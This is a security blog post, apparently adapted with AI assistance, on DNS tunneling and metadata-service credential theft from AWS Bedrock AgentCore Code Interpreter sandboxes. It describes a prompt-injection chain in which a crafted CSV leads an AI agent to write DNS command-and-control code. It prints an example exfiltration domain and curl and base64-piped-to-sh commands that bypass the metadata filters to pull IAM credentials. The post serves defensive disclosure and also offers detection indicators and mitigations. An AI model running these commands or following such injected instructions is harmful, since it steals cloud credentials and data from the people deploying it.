AWS Bedrock AgentCore Code Interpreter lets attackers exfiltrate data via DNS queries even in "Sandbox" mode — and AWS classified it as intended behavior, not a vulnerability.
Researchers from Phantom Labs and Sonrai Security independently demonstrated that DNS resolution bypasses sandbox isolation, enabling credential theft, S3 bucket enumeration, and full C2 channels through the one protocol every firewall allows by default.
If you deploy AI agents with code execution on AWS, the word "sandbox" doesn't mean what you think it means.
How DNS Exfiltration Bypasses Sandbox Isolation
Sandbox mode blocks outbound HTTP, HTTPS, and TCP — but DNS resolution on UDP 53 stays fully functional. Attackers encode stolen data into DNS subdomain labels:
c2VjcmV0LWtleQ.attacker-domain.com
These queries reach an attacker-controlled authoritative DNS server, carrying credentials, file contents, or bucket names in each request.
The Attack Chain
- Malicious input injection — crafted CSV with embedded instructions uploaded for AI analysis
- Code manipulation — AI agent generates Python code influenced by the payload
- DNS C2 establishment — generated code polls attacker domain via DNS
- Command execution — attacker returns commands encoded in DNS responses
- Data exfiltration — sensitive data encoded into subsequent DNS queries
At the packet level, this is textbook DNS tunneling:
| Step | Action | Layer |
|---|---|---|
| 1 | Sandboxed code calls socket.getaddrinfo()
|
Application |
| 2 | DNS query for encoded-data.evil.com
|
Transport (UDP 53) |
| 3 | Recursive resolver forwards to attacker's NS | DNS infrastructure |
| 4 | Attacker receives data in subdomain labels | Attacker-controlled |
| 5 | Response contains encoded commands in TXT/CNAME | Return path |
Max data per DNS label: 63 bytes (253 bytes total per query). At 100 queries/second, credentials and config files exfiltrate in seconds.
MMDS Credential Theft: The Bigger Problem
Sonrai Security's research reveals something worse: AgentCore Code Interpreters run on Firecracker MicroVMs exposing the MicroVM Metadata Service (MMDS) at 169.254.169.254 — the same endpoint as EC2's IMDS.
AWS implemented two string filters to block access:
://169.254.169.254/latest/meta-data
Both are trivially bypassed:
# Method 1: Variable splitting
IP="169.254.169.254"
METADATA="meta-data"
curl -s http://$IP/latest/$METADATA/iam/security-credentials/execution_role
# Method 2: Base64 encoding
echo "Y3VybCBodHRwOi8vMTY5LjI1NC4xNjkuMjU0L2xhdGVzdC9tZXRhLWRhdGEv" | base64 -d | sh
Once extracted, the attacker assumes the code interpreter's IAM execution role outside the sandbox. The default AgentCore Starter Toolkit role can include:
- Full DynamoDB access — read/write any table
- Full Secrets Manager access — retrieve any stored secret
- S3 read access — enumerate and download any object
AWS Says: "Working as Intended"
AWS reviewed both findings and classified them as intended functionality. Instead of patches, they updated documentation to clarify that Sandbox mode provides "limited external network access."
| AWS Position | Your Security Impact |
|---|---|
| DNS resolution is expected in Sandbox mode | Cannot rely on Sandbox to prevent exfiltration |
| MMDS access is by design | IAM credential theft is an accepted risk |
| Shared responsibility model applies | You must implement compensating controls |
| VPC mode is recommended | Additional cost and complexity required |
Practically: Sandbox mode provides less isolation than a zone-based firewall with deny ip any any on the outside interface. At least the firewall actually blocks DNS.
Detecting DNS Tunneling in Cloud Environments
Anomaly Indicators
| Indicator | Normal DNS | DNS Tunneling |
|---|---|---|
| Subdomain label length | 8-15 chars | 40-63 chars (max) |
| Query entropy | Low (readable) | High (Base64/hex) |
| Unique subdomains/domain | < 100/hr | 1,000+/hr |
| TXT record queries | < 5% of total | 30-60% of total |
| Query frequency to single domain | Sporadic | Sustained bursts |
| Response size | < 512 bytes | Consistently near limits |
Defense-in-Depth Stack
Layer 1 — DNS Resolution Restriction:
! Cisco IOS-XE: Restrict outbound DNS to approved resolvers
ip access-list extended DNS-RESTRICT
permit udp any host 10.0.1.53 eq 53
permit udp any host 10.0.1.54 eq 53
deny udp any any eq 53 log
Layer 2 — DNS Inspection: Deploy Cisco Umbrella, Infoblox BloxOne, or Palo Alto DNS Security to analyze query content in real time.
Layer 3 — VPC Network Controls: Deploy code interpreters in VPC mode with explicit security group rules. Route DNS through a controlled resolver with logging.
Layer 4 — IAM Least Privilege: Strip unnecessary permissions from execution roles. Use AgentCore Gateways with Lambda instead of direct AWS API access.
Real-World Risk Scenarios
Supply Chain Data Theft
AI agent processes vendor invoices via Code Interpreter. Malicious invoice contains embedded instructions. The interpreter — with S3 read access — enumerates all buckets and exfiltrates customer PII via DNS. Your firewall logs show normal DNS traffic. Your SIEM sees nothing. The data is gone.
Credential Pivoting
Attacker extracts IAM credentials via MMDS. Those credentials include secretsmanager:GetSecretValue from the Starter Toolkit role. Database credentials, API keys, encryption keys — all from a \"sandboxed\" environment.
Persistent C2 Channel
Compromised AI agent establishes DNS-based C2 that persists across sessions. Without DNS content inspection, it operates indefinitely below anomaly detection thresholds.
Immediate Actions
- Audit all Bedrock AgentCore deployments — identify Sandbox vs. VPC mode usage
- Review IAM execution roles — apply least-privilege; remove the default Starter Toolkit role
- Deploy DNS content inspection on all egress paths from AI workloads
- Enable CloudTrail data events for AgentCore (not logged by default)
- Block MMDS access using iptables rules within container/VM configs
-
Implement SCPs to restrict
bedrock-agentcore:CreateCodeInterpreterto authorized roles
The Broader Lesson
DNS has been the blind spot in network security since RFC 1035 in 1987. The protocol never anticipated queries carrying encoded payloads through firewalls. This AWS vulnerability demonstrates a decades-old weakness in a modern context.
This isn't AWS-specific either:
- Google Cloud Vertex AI code execution faces similar DNS exposure
- Azure AI sandbox implementations have the same architectural challenge
- Any container or MicroVM that allows DNS resolution is a potential exfiltration path
As organizations deploy more autonomous AI agents with code execution, the attack surface expands. DNS tunneling detection is no longer optional — it's table stakes.
Originally published at FirstPassLab.
AI Disclosure: This article was adapted from the original FirstPassLab post with AI assistance. All technical content has been reviewed for accuracy.
Top comments (0)